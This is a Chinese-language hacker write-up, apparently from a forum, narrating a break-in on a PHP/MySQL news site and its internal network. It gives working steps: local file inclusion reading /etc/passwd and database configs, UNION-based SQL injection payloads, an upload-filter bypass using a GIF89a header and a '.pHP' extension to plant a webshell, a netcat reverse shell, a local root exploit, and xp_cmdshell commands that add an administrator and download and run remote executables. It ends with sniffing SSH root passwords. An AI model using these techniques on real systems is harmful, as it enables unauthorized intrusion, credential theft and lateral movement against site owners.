PHP LINUX APACHE MYSQL許可權掙紮

拿到了站大概看了一下.PHP LINUX APACHE MYSQL組成.貌似還有一處用了一個讓我無法決定的資料庫.首先我們從
整個站的結構開始瞭解. 拿出WWWSCAN 由於我經常檢測國外的站我收集了很多敏感的目錄檔案等等 當然軟體作者
也收集了許多有用的.結果返回大概目錄有
/admin/
/config/
/news/
/news/newadmin/
/news/newadmin/test.php
/admin/test.php/info.php
省略..
有用的就這些.因為我最想要的就是後台.至少有了管理員的USER&pASS有了能用的地方.
admin目錄訪問提示403 newadmin出來一個登入頁.丫的開心.請出GOOGLE.
site:test.com inurl:php
site:test.com admin
site:test.com login
site:test.com filetype:php | asp | jsp | aspx | jsp | 由於是想看看其他子站有沒有WIN系統.這樣好插手.結果只有PHP 而且子站大多都是有HTML組成的
搜到這些大概得到了些資訊.大概看到了網站組成指令碼的名稱 心裡感覺可疑的可以注的點.還有一些比較少見的頁面.大家SEACH下會有這樣的感覺的
開啟工具箱.有個FUCKGOOGLE.exe 可以搜集所有GOOGLE搜到的URL 做成一個HTML給你.然後很多連結.大家可以在AD注入工具裡開啟這個頁面讓AD掃.
就算AD不是注MYSQL的.至少也分的清楚AND 1=1 和AND 1=2的區別.在AD放了10分鐘後看了下結果.沒啥好玩的...放棄GOOGLE.{注:這其中大家一定得耐心的觀察}
好了沒戲了.既然ADMIN目錄403就從他那開始下手.隨便猜了幾個登入頁面.RP問題沒出來.在WWWSCAN跑了一下 啥都木有..汗. 放棄...
新聞系統啊 新聞系統..你咋就是個新聞系統咧.後台至少可以讓我用溯雪跑一下.就算不科學 也碰碰運氣... 跑完了沒戲 {注:當然在這過程中你可以做其他的)
有了後台我怕 就是認證的問題.到處找點.一直都沒找到.有個VOTE.進去看了一下...誰誰誰 %xx. GET了' 出錯了.PHP送給我路徑. and 1=2 返回結果正常.和1=1沒啥區別.汗.再來
/**/and/**/1=2 還是一樣 大家當我在放屁吧.放棄 繼續找.... 找啊找..突然看到了個這麼個URL read4.php?files=include/hellokitty.html 這麼個串連. 去掉hellokitty.html PHP提示
Warning: Smarty error: unable to read resource: "include" in in /home/httpd/html/libs/test.php on line 1095
嘿嘿 爽了.接著我隨便找了一個他們站的圖片 提交 read4.php?files=../img/bar_logo.jpg 嘎嘎. 返回的結果是?\u0010JFIF\u0001\u0002dd?\u0011Ducky\u0001\u0004<?\u000EAdobed\u0001 省略....
好繼續.提交read4.php?files=../read4.php 返回
<?
require '../libs/xxxx******(假的).php';
include 'sqlfunc_csm2.inc';
session_start();
.....省略
有進展繼續.提交read4.php?files=../sqlfunc_csm2.inc
拿到的當然是MYSQL USER&pASS啦.前提不是ROOT.
好了.雖然沒找到點至少找到了一個另類的load_file.不管3721繼續攻擊!!!
read4.php?files=../../../../../etc/passwd
當然出來咯.找了幾個有/BIN/BASH的使用者 用MYSQL的密碼去嘗試SSH結果失敗.
不急.再來.我們必須得找到點.花了一個小時的功夫....
還是沒找到點.無奈之下用MAXTHON查看原始碼.就是表單啦.搜尋php 啊.無意中搜到一個很奇怪的頁面我在GOOGLE中也沒見過 好像是調用的吧.無聊
具體是../dj?msb=908 好傢夥開啟它...返回讓我一滴汗落下來...就出來個3456.最後我才發現這個頁面為了統計使用者訪問的次數.
加了個'出錯了. 1=2 1=1. ^_^ 功夫不負有心人. 我注我注我注.我直接注死.
and 1=2/**/union/**/select/**/1,2
好了 返回正常...
and 1=2/**/union/**/select/**/1,user()
返回剛才我暴出來的MYSQL.有些朋友就問了.你都拿到MYSQL密碼了.你怎麼還不去連人家資料INTO FILE呢?大哥我希望您看清楚.上面我說的結果20.*.*.* 影射..多的廢話我不想說.
and 1=2/**/union/**/select/**/1,database()
沒錯喔.出來的和暴出來的庫一樣.看你丫的我咋玩你.萬事齊全.就是管理員帳號和密碼了.
問題來了.表名....這個簡單啦.用剛才暴檔案的方法去暴login.php或它所POST的檔案就可以找到表明了.大家懂我意思吧.繼續注
and 1=2/**/union/**/select/**/news_admin,news_password/**/from/**/administrator55991 (BT吧 管理員很有意識)
暴出來了.密碼是BASE64 大家可以到http://makcoder.sourceforge.net/demo/base64.php 來解開.或者用CAIN的附加功能.或者一會我給大家發個編碼工具非常好用.
好了.拿到帳號密碼了.進入後台.編輯新聞和發布新聞.其他的說了浪費時間.當然有上傳功能啦.樂呵呵的上傳個php. ...
.....
神啊救救我吧.我都夠麻煩了..
必須上傳JPG或GIF.我砸電腦的念頭都有了...
穩定穩定..繼續...先找了一個真正的圖片.尾碼改成.fuck 上傳!! 提示成功.看了下上傳的後輟.沒錯.是.fuck.
娘地.原來破東西只檢測GIF頭.再來.在C99頭上加個GIF頭GIF89a 上傳!!!!
失敗!!!!!!!!!!!!!!!!!!!!!
穩定下..傳了個加GIF頭的JSP和CGI.上傳成功 不過人家伺服器不解析.
一根煙 出去呼吸一下新鮮空氣.突然抽煙的時候靈光一閃...對了!!!
上傳尾碼為.pHP帶GIF頭的馬兒...哇塞!!!! 成功咧.爽.{注意大家看清楚.PHP Php pHp等等的組合方式 具體原理我就不解釋了.各位牛都都知道.速破黑(SUPERHEI)的文章有寫
輸入密碼進入WEBSHELL...既然進來了.我們就搞個頂翻天.
這感覺真好啊.555555.進來以後上傳個NSTVIEW.php 進入TOOLS選項. 有個BACKDOOR. 本機執行nc -vvlp 520
點下Start 回來了個SHELL. 好開始提權.拿到肉特....
提交id
nobody.
提交uname -a
廢話 不然APACHE白做APACHE啊 白癡!!! -.-
linux 2.4.20 xxxxxxx
其實這中間也很巧合.可能運氣好吧.我用brk.c 成功提到肉特...
brk.c 大家可以去www.milw0rm.com seach下...
開始提權...
$gcc brk.c -o brk
$./brk
.....省略....
#sh.x.x
好了.繼續.
nmap -v -sS 20.1.0.1/16
返回一大堆.有一台WIN機器.大概是2K.LINUX使上不舒服.先搞定他吧.
開了139 445 1433 3389 5900
#netstat -an
發現這台機器還串連著那台2K的1433 狂喜...
記得前面的ADMIN目錄嗎?403那個...我大概看了下那個目錄的檔案仔細觀察看.include sql.php 緊張的開啟sql.php 哇/se/se/se 運氣實在好的不行了..
是SA喔.但是問題又來了...APACHE+LINUX不支援MSSQL啊.我又是菜鳥一隻.又不會寫PHP... GOOGLE了下搜到了好東西
freetds. LINUX管理MSSQL的工具. 趕快下載下來安裝
# wget http://xx.xx.com/freetds.tar.gz
# tar -zxvf freetds.tar.gz
# cd freetd./configure --prefix=/usr/local/freetds --with-tdsver=7.0
#gmake (產生Makefile，我實驗過，make也可以)
#gmake install (安裝)
OK了.繼續
#cd bin
#./tsql -h 20.1.0.9 -p 1433 -U sa -P XXXX98#4    登入成功後會出現>
>exec master.dbo.xp_cmdshell net user Randy xxxxx /add
>exec master.dbo.xp_cmdshell net localgroup administrators Randy /add
>exec master.dbo.xp_cmdshell ftp 12.12.12.12 | "Randy" | "121212"|"get down.exe"|"bye"| 我就省略的寫了...具體是那個FTP的BAT.大家都知道吧.
>exec master.dbo.xp_cmdshell down.exe http://www.xx.com/vidc.exe VIDC大家都會配置吧.
>exec master.dbo.xp_cmdshell down.exe http://www.xx.com/vidc.ini
>exec master.dbo.xp_cmdshell vidc.exe (執行之前 本地執行 vidc.exe -p 7777
>exit

好了.VIDC的連接埠也映射過來了.連結本地的127.0.0.1:7777 進到終端.安裝CAIN 開始SNIFF.
那伺服器也沒人管.1天半後.嗅到了SSH的密碼.ROOT $*2323****
全段都是相同帳號密碼.就這一台WIN. 就這樣網關帳號密碼.SSH 等等 更別提資料庫了